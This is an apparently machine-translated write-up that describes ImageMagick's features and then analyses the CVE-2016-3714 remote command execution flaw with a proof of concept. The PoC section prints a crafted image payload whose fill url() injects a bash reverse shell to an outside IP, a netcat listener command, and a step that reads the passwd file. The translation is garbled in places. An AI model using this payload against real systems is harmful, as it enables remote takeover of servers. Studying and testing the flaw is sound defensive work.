1.1 ImageMagick description
1. ImageMagick description
ImageMagick is a set of powerful, stable and open source set of tools and development kits that can be used to read, write and process the more than 8 9 basic format of the picture file, including the popular TIFF, JPEG, GIF, PNG, PDF, and PhotoCD formats. Using ImageMagick, you can according to web application of needs dynamic generated pictures, also can be one(or a group)pictures to change the size, rotate, sharpen, reduce the color or add effects, etc. operation, and the operation results in the same format or other format to save for picture of the operation, which can be via the command line, you can also use C/C++, Perl, Java, PHP, Python or Ruby programming to complete. While ImageMagick provides a high-quality 2D Toolkit, partial support for SVG. ImageMagic main focus on the performance, reduce bugs and provide a stable API and ABI, their official site is http://www. imagemagick. org/it.
ImageMagick is used to create, edit, composite picture software. It can read, convert, write a variety of formats pictures. Picture cut, color replacement, various effects application, image rotation, composition, text, line, polygon, ellipse, curve, attached to a picture of the extended rotation. ImageMagick is free software: full source code is open, you can freely use, copy, modify, publish. Supports most of theoperating system.
2. ImageMagick main function
(1)The image from one format to another format, including directly into the icon.
(2)Change the size, rotate, sharpen(sharpen), minus the color, picture effects
(3)a thumbnail image of the composite image( a montage of image thumbnails)
(4) is adapted to the web of the transparent background image
(5)a set of images made into a gif animation directly convert
(6) The a few pictures made into a combination of images, montage
(7)in a picture and write or draw a shape, with text-shadow and border rendering.
(8) to the image adding a border or frame
(9)to obtain some picture of the characteristics of the information
(1 0)includes almost gimp can be made to a conventional plug-in function. Even includes a variety of curve parameters of the rendering function. Just that command wording, complicated enough.
ImageMagick can be almost in any non-proprietaryoperating systemon the compilation, whether it is a 3 2-bit or 6 4-bit CPU, including LINUX, Windows '9 5/'9 8/ME/NT 4.0/2 0 0 0/XP,Macintosh (MacOS 9 /1 0), VMS and OS/2.
1.2 ImageMagick(CVE-2 0 1 6-3 7 1 4)remote execution vulnerability analysis
ImageMagick(CVE-2 0 1 6-3 7 1 4)remote execution vulnerability, the cause is because the character filter is not rigorous and the result of the code execution. For the file name passed to the after end of the command filter is insufficient,resulting in allowing a variety of file format conversion process in the remote code execution.
Affected version range:
1.3 available POC tests
Centos5. 8+ ImageMagick 6.2.8
In centos, the default install is ImageMagick 6.2.8, this installation 6. 7. 7-1 0 version.
Note: tar. xz file you need to use 7zip to unzip to a tar file then use tar-zxvf to decompress.
First construct a carefully prepared picture, the following content is saved as sh. png, where 1 2 2. 1 1 5. 4 x. 3x is bounced back to the listening port of the server, the listening port to 4 4 3 to 3.
fill'url(https://example.com/image.jpg"|bash-i >& /dev/tcp/122.115.4 x. 3x/4 4 3 3 0>&1")'
Execute the command
Before executing the command, the need to bounce the server on executing the“nc-vv-l-p 4 4 3 3”command. Execution of“convert sh. png 1. png”, the terminal will not respond until the bounce the shell to exit later, as shown in Figure 1.
Figure 1 executing the convert command
Execute the convert command, will be based on the network situation, in the listener on the server will delay for a few seconds, as shown in Figure 2, direct access to the bounce webshell。
Figure 2 get the rebound webshell
In bounce the shell terminates, it will display an error message, as shown in Figure 3.
Figure 3 shows the error message
1.4 summary and discussion
(1)construction exp. png
(2)implementation of exp to get the id and to view the passwd file
In Terminal mode, perform the convert exp. png 1. png is displayed after the ID and passwd in the content, as shown in Figure 4, indicating that vulnerability exists.